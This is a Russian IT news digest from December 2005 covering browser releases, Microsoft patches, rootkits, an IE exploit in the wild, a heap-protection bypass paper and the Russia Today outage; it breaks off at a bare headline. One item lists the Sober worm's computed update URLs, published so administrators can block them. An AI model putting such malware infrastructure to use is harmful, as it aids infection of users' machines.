Вышла новая версия браузера Portable Firefox, получившая индекс 1.5. Пакет Portable Firefox представляет собой модифицированный вариант Firefox, предназначенный для записи и последующего использования с портативных накопителей, таких как флэш-брелоки, внешние жёсткие диски или ZIP-драйвы. Кроме того, Portable Firefox можно загружать и на некоторые модели карманных медиаплееров. "Портативная" версия Firefox не требует инсталляции. Для работы с браузером достаточно распаковать архив в нужную директорию на внешнем накопителе и затем запустить файл PortableFirefox.exe. Примечательно, что в этом случае на винчестерах самого компьютера не остается никакой персональной информации, связанной с деятельностью пользователя в интернете. Portable Firefox обладает тем же набором функций, что и обычный Firefox. Для работы с браузером Portable Firefox 1.5 потребуется компьютер под управлением операционной системы Microsoft Windows 95/98/ME/2000/XP. Размер архива составляет 6,3 Мб, в распакованном виде программа занимает 16,2 Мб.
Подробности

13/12/2005 12:31 Новый рекорд скорости передачи данных в сети Интернет
Сообщается, что группе ученых с большим отрывом удалось побить рекорд скорости межконтинентальной передачи данных (расстояние между конечными точками - 35755 км.) . Пиковая скорость передачи данных достигла 151 Гбит/с, а официально зарегистрированный рекорд составил 131,6 Гбит/с, причем удалось на протяжении нескольких часов подряд поддерживать скорость обмена информацией на уровне 100 Гбит/с. При такой скорости пять DVD-дисков могут быть переданы всего за одну секунду, а на отправку содержимого Библиотеки Конгресса США уйдет около десяти минут. Всего в рамках эксперимента за 24 часа было передано 475 терабайт данных. Были использованы 22 волоконно-оптических канала, оптимизированную операционную систему Linux (ядро 2.6.12.6) и модифицированный алгоритм контроля перегрузки TCP потока Fast TCP. Для фиксирования рекорда использовалась утилита iperf. Также было проведено несколько экспериментов, по передаче данных используя модифицированную версию утилиты bbcp и объединению нескольких небольших кластеров в разных концах света, в качестве файловой системы использовалась NFS v4, с кешированием через dCache.
Подробности на opennet

13/12/2005 11:44 Microsoft начинает тестировать новый Messenger
Microsoft приступает к ограниченному тестированию обновления Windows Live Messenger, которое дополнит интернет-пейджер такими возможностями, как телефонная связь через интернет. По существу, это расширенный MSN Messenger, дополненный рядом функций, продолжающих процесс превращения программы из средства обмена короткими сообщениями в менеджер всех видов связи. О предстоящем выпуске закрытой бета-версии Live Messenger сообщили многие сайты энтузиастов, включая Mess.be и BetaNews, а Messenger Blog даже предложил якобы скриншоты нового ПО. Microsoft от комментариев отказалась, но пообещала бета-версию в этом месяце. В начале ноября Microsoft уже демонстрировала новый интернет-пейджер на презентации своих сервисов Live. В понедельник вечером Microsoft подтвердила свои планы и подробнее рассказала о соглашении с MCI, отметив, что оно неэксклюзивное. Сначала две компании сделают телефонную связь доступной заказчикам в пяти странах: США, Франции, Германии, Испании и Великобритании.
Подробности

13/12/2005 11:06 Ещё раз об инциденте с Russia Today
Во вторник, 13 декабря, после однодневного перерыва телеканал Russia Today возобновил свою работу. Сотрудники первой в России круглосуточной новостной "кнопки" заверяют, что были вынуждены покинуть эфир после того, как подверглись атаке хакеров. В официальном пресс-релизе говорится, что телеканал подвергся хакерской атаке, в результате чего были заражены вирусами редакционные машины. В отличие от других российских каналов, RT целиком построен на так называемом безленточном производстве, то есть весь эфир монтируется и верстается на компьютере. Такая технология получила широкое распространение на информационном телевидении, в частности, ее использует CNN, ВВС-24, Sky News. Компьютерные монтаж и верстка позволяют быстро обновлять новостной эфир и при этом не тратить огромные средства на расходные материалы. Большинство российских вещателей дублируют новейшие технологии еще и "дедовским способом". В результате, если подводит техника, то ведущие читают тексты на бумаге, а не на телесуфлере. На RT не предусмотрена такая возможность - когда в понедельник вышел из строя центральный компьютер, телеканал попросту исчез из эфира. Большинство телевизионных и компьютерных специалистов согласны, что сбой в работе RT был связан с техническими проблемами, однако скептически отнеслись к версии о хакерской атаке. Руководство телеканала неоднократно говорило о том, что использует самые современные технологии. А они позволяют вовремя заметить активность хакеров и нейтрализовать ее последствия. По мнению программистов, кибератака могла осложнить работу не больше, чем на несколько часов."Никаких следов взлома сайта также не обнаружено, говорить о какой-то целенаправленной хакерской атаке на основании имеющейся информации я бы не стал", - говорит ведущий аналитик "Лаборатории Касперского" Алексей Гостев в интервью "Газете.Ru". По словам эксперта, сайт www.russiatoday.ru не функционирует на каком-либо скрипт-engine, что исключает подавляющее число способов его взлома. Российские газеты выдвинули несколько версий произошедшего: выход из строя одного из коммутаторов, плохо написанная компьютерная программа, техническая безграмотность персонала - по мнению экспертов, журналисты попросту не успели освоить новые технологии. А сами сотрудники телеканала в частных беседах настаивают на том, что кто-то с личного лэптопа загрузил в общую сеть файл, зараженный неизвестным компьютерным вирусом.
Источник

13/12/2005 10:42 В Британии запущен сервис самоуничтожающихся SMS
Британская компания Staellium разработала новую технологию, призванную повысить конфиденциальность мобильной связи. Запущенный недавно сервис StealthText обеспечивает уничтожение посланного SMS-сообщения, на случай если оно отправлено не по адресу. Получателю даётся только 40 секунд на прочтение SMS, затем оно исчезает. Технически это реализовано следующим образом: пользователь получает не само сообщение, но ссылку на него. Сами же SMS хранятся на сервере оператора, который нужно посетить в течение 40 секунд. По истечении этого времени сообщение становится недоступно. Как сообщается, собственно уничтожение SMS происходит несколько позже, некоторое время оно хранится для нужд национальной безопасности. Для использования самоуничтожающихся SMS нужно подписаться на сервис StealthText, позвонив по специальному номеру. Телефон пользователя, желающего подключить услугу, обязан поддерживать WAP. Пользователь должен скачать WAP-приложение и отправлять секретные сообщения только с его помощью. Получать сообщения в формате StealthText могут только владельцы WAP-телефонов, скачивать дополнительное ПО им не нужно. В портфолио Staellium есть аналогичный сервис StealthMobile, обеспечивающий уничтожение электронных писем, голосовых и видеосообщений.
Подробности

12/12/2005 15:20 Мониторинг Internet для провайдеров
Компания Renesys готовит к вводу в действие доступный через Web набор сервисов, позволяющих следить за работой Internet, Renesys Internet Intelligence Services. Сервисы полагаются на данные реального времени о маршрутизации в Internet, собранные Renesys. В составе службы - три компонента, Routing Intelligence, Market Intelligence и XML Connection. Первый дает провайдеру информацию для идентификации и устранения замедлений работы и прерываний Internet-соединений; поддерживается возможность оперативного уведомления пользователей о различных сбоях в Глобальной сети. Второй сервис представляет собой набор справочно-аналитических инструментов, позволяющих персоналу служб сбыта, маркетинга и развития бизнеса получать информацию реального времени о производительности сетей конкурентов. Сервис полагается на обновляемую в реальном времени карту провайдерских сетей и информацию о количестве и качестве подключенных к ним сетей клиентов. Третий сервис - набор API, позволяющий передавать в основанном на XML формате данные о производительности Internet в системы мониторинга безопасности.
"Открытые системы"

12/12/2005 13:26 Точки доступа WiFi
Обнаружен довольно любопытный и полезный сайт, который поможет найти точки доступа беспроводной связи (WiFi) по всему миру. Представлены 25 стран. Как указано на странице сайта, база данных freeWiFi.ru поддерживается энтузиазмом ее посетителей. Автор проекта - Руслан Курепин.
Сайт проекта

12/12/2005 12:32 Хакеры приостановили работу телеканала Russia Today
Первый российский круглосуточный информационный англоязычный телеканал Russia Today в понедельник прервал вещание в связи с попытками взлома его компьютерной сети, сообщается в пресс-релизе канала. "В связи с попытками взлома компьютерной сети телеканала Russia Today извне и подозрением на заражение вирусами, телеканал вынужден прервать вещание до устранения технических неполадок", - говорится в сообщении. Russia Today приносит свои извинения телезрителям. Канал начал спутниковое вещание в минувшую субботу. Большая часть эфирного времени была отдана под выпуски новостей - получасовой выпуск каждый час. В промежутках между новостями транслировались документальные фильмы, тематические новости о России, программа "Россия в деталях" и другие. На телеканале трудится около 360 ведущих, корреспондентов, редакторов, монтажеров, режиссеров и других сотрудников, обеспечивающих вещание, в том числе около 80 иностранных специалистов, а всего здесь работает более 500 человек. О запуске нового канала было объявлено в июне. Техническое вещание он начал с 15 сентября текущего года.
Источник

12/12/2005 12:18 Спам в России действительно непобедим
Совсем недавно Россию облетела радостная весть — Комитет Государственной Думы по экономической политике, предпринимательству и туризму рекомендовал Думе принять во втором чтении проект новой редакции ФЗ «О рекламе», внесенный в конце 2004 года депутатами Волковым, Гасановым, Драгановым, Кармеевым, Комиссаровым, Медведевым, Мединским и Скоч. Едва ли не единственным лейтмотивом комментариев по этому поводу стало предвкушение скорого конца российских спамеров, которым посвящена одна из статей законопроекта — «Реклама, распространяемая по сетям электросвязи общего пользования». Согласно ей, распространение подобной рекламы допускается только при наличии предварительного согласия ее получателя, при этом распространителю рекламы вменяется в обязанность доказать, что означенное согласие было получено. Преждевременность народного ликования и стихийных митингов в поддержку законодательной инициативы по искоренению спама на Руси очевидна уже потому, что рекомендация комитета, возглавляемого депутатом Драгановым В. Г., принять законопроект, внесенный депутатом Драгановым В. Г., согласно Регламенту Госдумы и здравому смыслу — процесс обязательный и само собой разумеющийся. Препятствия же к принятию закона, блюдущего чистоту электронных почтовых ящиков, имеют совершенно иное свойство.
Более подробно о законопроекте

12/12/2005 11:41 EBay удалил лот с "дырой" в Excel
Администрация онлайнового аукциона eBay сняла с торгов лот, в котором предлагалась информация об уязвимости в Microsoft Excel, на основании его незаконности и жалобы со стороны Microsoft. Предложенная уязвимость, по заявлению анонимного продавца, позволяла захватить контроль над компьютером при открытии на нем специально сконструированного файла формата xls. Специалисты Microsoft Security Response Center (MSRC), которые пожаловались на лот руководству аукциона, приняли сигнал и начали работать над поиском "дыры". "Обычно, исследование можно продавать как продукт. Однако, если оно нарушает закон или право на интеллектуальную собственность, это делать запрещено", - сказала представитель eBay Катерина Ингланд (Catherine England). Приобретение уязвимостей – неоднозначная практика, которая применяется как минимум двумя компаниями ИТ-безопасности: iDefense и TippingPoint (3Com). Однако эти компании приобретают "дыры" в целях защиты пользователей. Человек, разместивший лот, назвал себя fearwall, и описал уязвимость вместе с нападками на корпорацию. "Поскольку я не смог найти никакого применения этого побочного продукта у разработчиков Microsoft, он доступен для вас по цене от 1 цента – честной цене для любого продукта Microsoft", - заявил он.
CNews

12/12/2005 11:09 В декабре Microsoft выпустит два новых патча
Во вторник, 13 декабря в рамках ежемесячного обновления своих программных продуктов корпорация Microsoft планирует выпустить две новые заплатки. Как сообщается в предварительном уведомлении, дыры обнаружены в операционных системах Windows. По крайней мере, одна из уязвимостей получила статус критической и, соответственно, может использоваться злоумышленниками с целью захвата контроля над удаленным компьютером. Инсталляция патчей потребует последующей перезагрузки компьютера. Заплатки для ОС Windows будут выпущены одновременно с обновленной версией утилиты для обнаружения наиболее распространенных вредоносных программ - Microsoft Windows Malicious Software Removal Tool. Кроме того, через сервисы Windows Update, Software Update, Microsoft Update и Windows Server Update корпорация Microsoft выпустит пять обновлений, не связанных с безопасностью.
Уведомление

12/12/2005 10:23 Пятая часть вредоносных программ в Windows XP - руткиты
Эксперты из антивирусного подразделения Microsoft говорят, что 20% всего вредоносного софта, удаляемого из операционной системы Windows XP SP2, приходится на долю руткитов, сообщает "Компьюлента". Одну из лидирующих позиций в списке вредоносных программ всех мастей, регулярно удаляемых бесплатной антивирусной утилитой Windows worm zapping, занимает опенсорсный руткит FU. Он обнаруживается в различных версиях программы Rbot - системы обхода защиты IRC, используемой для незаконного заражения систем с Windows шпионскими программами. Помимо FU, в пятёрке "лучших" ежемесячного вирус-листа находятся другие руткиты семейства WinNT/Ispro. Они тоже часто идут "в комплекте" со шпионским софтом, чтобы удалённый злоумышленник имел возможность изменять определённые файлы и регистрировать ключи и не быть обнаруженным. Кроме того, в системах часто находится другой руткит - Hacker Defender, который свободно продается в интернете. По словам представителя подразделения Джейсона Гармса, большое количество руткитов, удаляемых из систем, говорит о том, что вирусописатели используют самые современные технологии, чтобы предупредить обнаружение вредоносных программ.
EWeek

12/12/2005 10:08 Код Sober расшифрован
Антивирусные компании вскрыли алгоритм, используемый червем Sober для «общения» с автором. В ноябре последний вариант червя Sober навел хаос, являясь пользователям под личиной писем из ФБР и ЦРУ. Антивирусные компании знали, что червь каким-то образом управляется через веб. Он запрограммирован так, чтобы автор мог контролировать зараженные машины, а если требуется — и изменять поведение самого червя. В четверг финская антивирусная фирма F-Secure сообщила, что она расшифровала алгоритм, используемый червем, и может вычислить точные адреса URL, которые тот посещает в любой день. Главный специалист F-Secure Микко Хиппонен пояснил, что автор вируса не использует постоянный URL, так как его быстро заблокировали бы. «Sober создает псевдослучайные адреса URL, которые меняются в зависимости от дат. 99% этих URL просто не существует… Однако автор вируса может рассчитать URL на любую дату, и когда ему нужно сделать что-либо на всех зараженных машинах, он просто регистрирует соответствующий URL, загружает туда свою программу и БАХ! Она выполняется на сотнях тысяч машин во всем мире», — пишет Хиппонен в своем блоге. По расчетам F-Secure, 5 января 2006 года все компьютеры, зараженные последним вариантом вируса Sober, будут искать обновленные файлы в следующих доменах: people.freenet.de/gixcihnm/, scifi.pages.at/agzytvfbybn/, home.pages.at/bdalczxpctcb/, free.pages.at/ftvuefbumebug/, home.arcor.de/ijdsqkkxuwp/. Хиппонен рекомендует администраторам лишить любые зараженные ПК возможности автоматического обновления, заблокировав доступ к этим доменам. Менеджер Trend Micro Адам Бивиано считает, что блокирование URL, может быть, и полезно, но все же надежнее всего было бы сделать все ПК безопасными. «Блокирование этих URL неплохая идея, но в первую очередь задача администраторов — гарантировать, что их машины не заражены», — прокомментировал он.
Более подробно

11/12/2005 14:51 IEEE утвердил мобильный стандарт WiMAX
Институт инженеров электроники и электротехники (IEEE, Institute of Electrical and Electronics Engineers) утвердил мобильный стандарт WiMAX, который отныне будет обозначаться как IEEE 802.16e-2005. Утверждение стандарта ждали еще два месяца назад, когда были подготовлены все спецификации 802.16e, но сам факт состоялся только сейчас. Данное событие является весьма значимым для всей мобильной индустрии, оно должно придать дополнительный импульс развитию сетей на основе WiMAX. Тестирование мобильного WiMax начнется в начале следующего года при поддержке WiMax Forum, а готовых решений не стоит ждать ранее 2007 года. Первоначально планировалось, что разработка спецификаций нового стандарта, которая началась в декабре 2002 года, займет 18 месяцев, в действительности потребовалось вдвое больше времени.
Источник

11/12/2005 14:17 Intel не считает благотворительный ноутбук за $100 полноценным компьютером
Ранее сообщалось об инициативе лаборатории Массачусетского Технологического Института по продвижению бюджетного ноутбука стоимостью $100, который должен был закупаться правительствами развивающихся стран для образовательных целей. Считалось, что дети из малообеспеченных семей будут получать эти ноутбуки бесплатно в школе, а все желающие приобрести эту бесхитростную "шарманку" за деньги должны будут выложить примерно $200. Между тем, инициатива пока продвигается очень медленно из-за технологических и экономических проблем. Прежде всего, производителям не удаётся уложиться в заданные рамки себестоимости - даже с учётом возможных дотаций, конечная стоимость такого ноутбука не должна существенно превышать $100. Работа над устранением проблем откладывает момент выхода этого компьютера на более поздний срок, чем рассчитывали участники инициативной группы. Хотя данный проект получил благословение главы ООН, представители Intel позволяют себе высказываться о перспективах подобного продукта весьма скептически. Например, сайт ABC News опубликовал выдержки из выступления одного из первых лиц компании Intel на пресс-конференции на Шри-Ланке. Intel считает, что подобный ноутбук нельзя считать полноценным компьютером, это скорее так называемый "gadget", то есть интересная цифровая штуковина, мало чем отличающаяся от наладонных компьютеров или электронных записных книжек. Уровень функциональности этого устройства достаточно скоро перестанет отвечать запросам пользователей, ещё недавно не имевших никакого представления об информационных технологиях. Дешёвый компьютер должен обладать возможностью работы с "взрослыми" приложениями - в этом твёрдо уверены представители Intel.
Источник

11/12/2005 13:37 Выход Nmap 3.95
После выхода 2-х альфа-релизов версии 3.94 выпущена версия 3.95 этого популярного сканера. В новой версии проделана работа по уменьшению количества потребляемой памяти, устранены баги при вызове различных видов сканирования, полностью переписана страница документации man, ну и, естественно увеличена база детектируемых операционных систем.
CHANGELOG

11/12/2005 12:10 Поисковик, разработанный студентами и аспирантами ВМиК МГУ, обзавелся собственным индексом
В конце ноября разработчики поисковой системы Nigma.Ru объявили о начале работ над собственным индексом, который в дальнейшем позволит избежать обращений к другим поисковым системам. Предполагается, что до конца 2005 года закончится альфа-тестирование алгоритма поиска и будет заказано оборудование необходимое для индексации всего российского интернета. В данный момент около 25 тысяч наиболее популярных сайтов проиндексировано «в глубину» (по несколько тысяч страниц с каждого сайта) и еще 200 тысяч – для полноты поиска, сообщает Вебпланета. Для того, чтобы протестировать «собственный» поиск необходимо, снять «галочки» других поисковых машин в форме поиска, оставив отмеченным только «Nigma». Поиск осуществляется с учетом близости слов, а также с использованием двухстадийного алгоритма морфологического поиска (на первой стадии ведется поиск точно тех словоформ, которые задал пользователь, а вторая стадия запускается только если на первой стадии найдено слишком мало документов). В ближайшее время планируется расширение синтаксиса запросов для поиска фраз. Поисковая система Nigma.Ru была запущена в апреле этого года. Разработчиками выступили студенты и аспиранты факультетов ВМиК и психологии Московского государственного университета им. М.В. Ломоносова. Ими были разработаны оригинальные метапоисковые алгоритмы ранжирования результатов поиска, позволяющие объединять результаты выдачи популярных поисковых систем и группировать их в смысловые кластеры. В настоящий момент проектом занимаются студенты и аспиранты ВМиК, но им периодически помогают и другие факультеты. Размер и состав команды постоянно меняется, но ядро команды – 4 человека, сообщил в интервью MsuNews руководитель проекта Виктор Лавренко. Научные руководители – член-корр. РАН Королев Лев Николаевич (зав.каф.) и доцент Попова Нина Николаевна, кафедра АСВК факультета Вычислительной математики и кибернетики МГУ.
Подробности

11/12/2005 11:29 Обход защиты Windows XP SP2
Brett Moore опбуликовал довольно любопытный документ, представляющий собой исследование возможности управления динамически выделяемой памяти для контроля выполнением кода после выполнения операции перезпуска заголовка. Как пишет сам автор, во втором сервис-паке (SP2) была применена новая технолгия защиты, предотвращающая возможность перезаписи заголовков динамически выделяемой памяти (overwritten heap headers) для заполнения произвольным кодом. Эта защита, говорит автор, достаточно хорошо документирована в различных источников. В выпущенном исследовании рассматривается возможность перезаписи freelist[0] посредством двух новых методов. Первый метод выполняет запись адреса входных данных в произвольную ячейку памяти. Второй метод позволит вернуть произвольный адрес функции HeapAlloc.
Исследование в ZIP-формате

11/12/2005 11:12 Меч без щита
Опубликованный недавно эксплойт для дефекта защиты в Internet Explorer взят на вооружение хакерами. В частности, по сообщениям компании Panda на порнографических сайтах замечено появление кодов JavaScript, которые загружают на компьютеры незадачливых посетителей троянскую программу Downloader.DLE, снижающую уровень безопасности браузера и позволяющую загружаться другим вредоносным программам. Аналогичные вредоносные коды зафиксировала и компания Sophos, назвав их Clunky-B. Хотя коды уже используются для захвата компьютеров, но Microsoft до сих пор не исправила ошибки в своем браузере. Хотя корпорации сообщили о проблеме еще в мае, но ее разработчики посчитали ошибку не очень опасной, поскольку тогда она приводила только к прекращению работы Internet Explorer, но недавно хакеры нашли способ исполнения кода с помощью этой ошибки. Поскольку исправлений пока нет, то рекомендуется при использовании IE выключать JavaScript или пользоваться другими браузерами. Также рекомендуется обновить базы данных антивирусов, которые смогут распознать вредоносный код.
Источник

11/12/2005 10:38 Выход второго номера журнала "Open Source"
Вышел второй выпуск электронного приложения к журналу «Системный адиминистратор», полностью посвященного программному обеспечению с открытым кодом, — «Open Source» 002. В номере: «Новости мира Open Source»; «GNU GPLv3 на подходе»; «Gaim и SIM: пейджеры-универсалы»; «Просто о сложном: установка Gentoo Linux»; «OpenPKG: кросс-платформенная система пакетов». Для получения доступа к PDF-файлу с журналом необходимо пройти процедуру регистрации.
Сайт проекта

11/12/2005 10:17 Обзор подходов в реализации IPSec
Как сообщает opennet.ru, опубликована 29 глава "IP Security Protocols" из книги "The TCP/IP Guide" (автор Charles M. Kozierok) в которой описываются различные архитектурные решения и подходы в реализации IPSec.
Статья

10/12/2005 13:15 Киберсквоттеры захватили тольяттинскую ГАИ
Достаточно интересный виртуальный поединок произошел нынешней осенью между информационной службой ГАИ г.Тольятти и неизвестным захватчиком доменных имен в сети Интернет (киберсквоттером). Не уследив вовремя за проплатой доменного имени популярного и посещаемого сайта www.gaitlt.ru, тольяттинские "гаишники" в одночасье лишились своего виртуального представительства. Через некоторое время домен был перерегистрирован на имя нового владельца и предложен на продажу. Однако тольяттинская служба Госавтоинспекции не стала вступать в переговоры о выкупе утраченной интеллектуальной собственности и вести виртуальный бой, а сделала "рокировку". В ноябре прежний сайт у ГИБДД г.Тольятти вновь заработал, но только под новым доменным именем - www.tltgai.ru. Посещаемость при этом хоть и немного упала, но популярность и информационная составляющая сайта осталась на прежнем, довольно высоком уровне.
Источник

10/12/2005 12:42 Sophos опубликовал десятку самых популярных вирусов года
«ДиалогНаука», официальный партнер компании Sophos в России, сообщает, что Sophos в своем новом годовом отчете о наиболее актуальных проблемах безопасности определил десятку самых распространенных угроз 2005 года. За год количество новых угроз выросло на 48%, при этом давно известный червь Zafi-D занял первое место в списке, в то время как наиболее распространенный вирус прошлого года, Netsky-P, отошел на второе место. В отличие от них, червь Sober-Z, появившийся лишь в ноябре 2005, занял третье место и продолжает препятствовать работе сетей по всему миру. В отчете Sophos по управлению угрозами за 2005 год (Sophos Security Threat Management Report 2005), составленном экспертами SophosLabs, отмечается, что в 2005 году в среднем вирус были обнаружен в каждом 44 письме электронной почты. Для случаев серьезных вирусных эпидемий это соотношение возрастало до одного из 12. Всего за год было обнаружено 15907 новых угроз. Интересно, что все угрозы десятки являются Windows-червями, но общее число троянов и червей в 2005 году соотносится примерно как 2:1. Кроме этого, процент вредоносных программ, включающих шпионские компоненты, вырос с 54,2% в январе до 66.4% в конце года. Это означает перенос внимания авторов вредоносных программ с массовых «бомбардировок» на нацеленные атаки. Это также объясняет и рост доли спама, рассылаемого через сети зомби-компьютеров, на который сейчас приходится уже более 60% от общего объема мирового спама. Отчет Sophos показывает, что незащищенный и подключенный к интернету компьютер в 40% случаев будет заражен вредоносным червем уже в первые 10 минут работы и превратится в зомби, которым управляет удаленный хакер.
Отчёт в формате PDF

10/12/2005 12:10 В Gmail появились RSS-агрегатор и возможность просмотра вложений как HTML
Компания Google реализовала в почтовой службе GMail сразу три полезных функции. Первая из них - это возможность загрузки заголовков из RSS-лент. Вообще, у Google уже есть свой (весьма оригинальный) RSS-агрегатор под названием Google Reader. Агрегатор, встроенный в GMail, работает несколько иначе. Он умеет выводить только заголовки и занимает всего одну строчку над основным списком писем (на иллюстрации она обведена красным). Называется эта строка Web Clip. Переключение между заголовками осуществляется автоматически, но при желании можно листать их с помощью расположенных в правой части Web Clip кнопок. Для настройки лент кнопка Customize. По умолчанию в Web Clip записаны несколько RSS-лент с популярных сайтов. При желании неинтересные ленты можно убрать, а более подходящие - добавлять. Поскольку агрегатор занимает на экране всего одну строчку, читать с его помощью большое число лент неудобно. Однако для пары новостных сайтов или в меру часто обновляющихся блогов Web Clip подходит неплохо. Вторая функция - это возможность просмотра вложений нескольких форматов Microsoft Office, OpenOffice и PDF в виде HTML. Такая функция давно есть в поисковой системе Google, а сейчас ее реализовали и в почте. Теперь рядом с понятными GMail вложениями показывается сразу две ссылки: для скачивания и для просмотра в виде HTML. Если нажать на вторую, то откроется новое окно браузера, в котором будет показан текст вложения. Вставленные в документ картинки не отображаются - чтобы увидеть их, файл придется скачать. Графические файлы, как и прежде, показываются прямо в письме в виде уменьшенных копий.
Подробнее

10/12/2005 11:48 Symantec хочет продавать антивирусы в онлайне
Symantec будет постепенно двигаться по направлению к распространению своих потребительских приложений — таких как Norton Antivirus и Norton Utilities — в форме услуг. В четверг, в ходе беседы за круглым столом в Сиднее вице-президент Symantec по Азиатско-Тихоокеанскому региону Дэвид Сайкс объяснил, что так как широкополосный доступ становится все популярнее и пользователи привыкают приобретать ПО в онлайне, а не в коробках, появляется возможность продавать средства защиты — и даже утилиты для ПК — как услуги. Сайкс утверждает, что это уже происходит в таких странах, как Корея, где сервис-провайдеры перепродают приложения Symantec и других компаний. «ISP лицензируют наш продукт и предоставляют услуги — производят сканирование, оптимизацию диска и другие операции, которые выполняет Norton SystemWorks, — передавая это по цепочке вниз», — пояснил он. По словам Сайкса, такие организации, как онлайновые банки, могут перепродавать отдельные мелкие части приложения или сеансы антивирусного сканирования, предлагая своим клиентам перед тем, как войти в систему, проверить, не заражен ли их компьютер вирусом или шпионским ПО. «Клиент заходит на сайт интернет-банка, и тот при помощи своих инструментов сканирует его компьютер. Он может сообщить: „Вы заражены Sobig (или другим червем)”, после чего откроется окно поставщика антивируса с предложением: „Хотите решить эту проблему или приобрести антивирусный продукт?”». Расплачиваться за эти услуги можно кредитной картой или добавив их стоимость к счету за сотовый телефон. Банки могут сделать антивирусную проверку обязательной, приняв решение не допускать к своим службам пользователей зараженных компьютеров.
Источник

10/12/2005 11:06 В городах России установят бесплатные автоматы для выхода в Интернет
В Москве и других городах России начата установка "инфоматов" - "мультимедийных автоматов на базе компьютера в массивном металлическом корпусе", которые позволяют всем желающим бесплатно пользоваться доступом в Интернет и различными информационными сервисами. Этот проект реализуется в рамках федеральных целевых программ "Электронная Москва" и "Электронная Россия". Накануне запуск первых инфоматов прошел в Москве в торговом центре "Электроника на Пресне" рядом со станцией метро "Улица 1905 года", говорится в поступившем в редакцию "Ленты.Ру" сообщении организаторов проекта. Проект является инициативой компании "МосАвтомат", которая реализует его совместно с национальной почтовой службой Mail.Ru. В скором времени более тысячи инфоматов планируется установить в различных местах Москвы и других крупных городов России. Инфоматы могут работать в бесплатном и платном режиме. В бесплатном режиме можно без ограничения времени пользоваться сервисами Mail.Ru, посещать сайт ЗАО "МосАвтомат", сайты московского правительства, проектов "Электронная Москва" и "Электронная Россия". Время на бесплатное посещение других сайтов в течение одного сеанса ограничено 5 минутами. "Пользователи бесплатно и без ограничений могут получить такие услуги как поиск по карте города, отправку sms-сообщений, доступ к социально-значимой информации и тому подобное", - пишут организаторы проекта. Также указывается, что с помощью инфомата можно "создавать аудио/видео сообщения, печатать информацию на встроенном принтере, загружать информацию из сети на карты памяти и флэш-карты".
Более подробно

10/12/2005 10:41 Еще одна система копирайтной защиты Sony оказалась вредоносной
Еще одна система защиты музыкальных дисков от копирования, применяемая музыкальным подразделением компании Sony - SonyBMG, - оказалась вредной для компьютеров владельцев таких дисков. На этой неделе было объявлено, что система MediaMax компании SunnComm при взаимодействии с операционной системой Windows делает ее уязвимой для хакерских атак. О "дыре" в MediaMax объявила известная правозащитная организация Electronic Frontier Foundation (EFF), занимающаяся проблемами гражданских свобод в Интернете. SonyBMG признала наличие уязвимости и выпустила по этому поводу совместное с EFF заявление. Также SonyBMG опубликовала на своем сайте программную "заплатку", устраняющую эту уязвимость, равно как и программу, удаляющую MediaMax из системы. По данным BBC News, эта защита встроена в 32 музыкальных альбома, изданных в США и Канаде. Как сообщает BBC News, представители Sony, комментируя историю с MediaMax, заявили, что компания будет в ближайшее время пересматривать свою политику в сфере копирайтной защиты.
Подробности

9/12/2005 14:51 Максим Ковальчук признал себя виновным и ждет приговора
В мае 2003 был арестован в Таиланде гражданин Украины Максим Ковальчук, куда приехал с женой на отдых, а позже экстрадирован в США. Ковальчука обвиняют в незаконном распространении пиратских компьютерных программ, что, по версии следствия, нанесло компаниям-производителям ущерб в $3 млн. А сейчас он признал себя виновным и ждет приговора. Калифорнийская прокуратура добилась выдачи вышеуказанного Ковальчука, который, будучи в бангкокском торговом центре Central Pinklao, зашел с женой в расположенное на первом этаже кафе-мороженое S&P и был арестован на выходе таиландской уголовной полицией, действовавшей в тандеме с американской Секретной службой и почтовым ведомством США. Местная полиция заявила, что он приехал в Таиланд на отдых 7 мая 2003 года и его настоящее имя — Максим Высочанский, хотя в уголовном деле, возбужденном в Сан-Хосе, он значится как Ковальчук. Житель Тернополя обвинялся в компьютерном пиратстве, торговле контрафактной продукцией, отмывании денег и хранении закрытой информации, относящейся к кредитным картам. Его обвиняли в том, что, сидя дома или в тернопольских интернет-кафе, он вломился в компьютеры нескольких компаний, производящих программное обеспечение (ПО), таких как Adobe, Autodesk, Microsoft и Micromedia, а также частных лиц, похищал у них ПО и потом продавал его по бросовым ценам на сетевом аукционе еВау или на сайтах вроде cdservice.org, your-cds.org, gold-cds.org или neocds.org. Иногда он отправлял покупателям ПО с фальшивой маркировкой, а иногда просто слал им компакт-диски безо всяких инструкций и прочей сопутствующей документации. Общаясь с потенциальными клиентами по электронной почте, Ковальчук-Высочанский пользовался псевдонимами. Плату он получал на как минимум 16 адресов в США и Восточной Европе, принадлежавших либо частным лицам, либо компаниям по обработке платежей, сделанных кредитками. Те, в свою очередь, перечисляли ему выручку в украинские банки. 20 тысяч долларов были перечислены в один литовский банк. Заметая следы, Ковальчук-Высочанский пользовался в интернете псевдонимами типа Патриша Бреклс или Кевин Макгуиган.
Подробности

9/12/2005 14:42 Планы выпуска Mozilla Firefox 2.0
Первую альфа-версию Firefox 2.0 планируется выпустить 10 февраля 2006 года, а релиз намечен на 27 июня, сообщает opennet.ru. Из новшеств Firefox 2.0 можно отметить новые системы для закладок и истории работы, улучшения в работе табов, полную интеграцию поддержки RSS, улучшения в подсистеме управления расширениями, средства борьбы с фишингом, включение средства записи сессий (Session Saver), средства работы в режиме offline и проверки орфографии на лету. Подробнее о запланированных возможностях для Firefox 2.0 и 3.0 можно прочитать на wiki-странице проекта, планы по развитию движка представлены в документе «Gecko 1.9 Roadmap».
Подробности

9/12/2005 13:53 Планировщик пакетов SRR (Simple Round Robin)
Simple Round Robin планировщик пакетов - это планировщик сетевых пакетов для операционной системы linux с ядрами 2.4 и 2.6. Его целью является просто равномерное распределение ресурсов отведенной полосы между ее потребителями. Работает он следующим образом: внутреняя очередь планировщика разделяется на заданное количество виртуальных очередей (слотов). Каждый слот, в свою очередь, имеет жестко заданный предел количества находящихся в нем пакетов. Внутренний классификатор распределяет поступающие в планировщик пакеты по слотам, основываясь либо на ip адресе получателя, либо на ip адресе отправителя. При выборе пакета из планировщика, слоты будут обрабатываться циклически, что обеспечит более или менее равномерное распределение.
Страница проекта

9/12/2005 13:31 Процессор Sun Niagara II может появиться в 2007 году
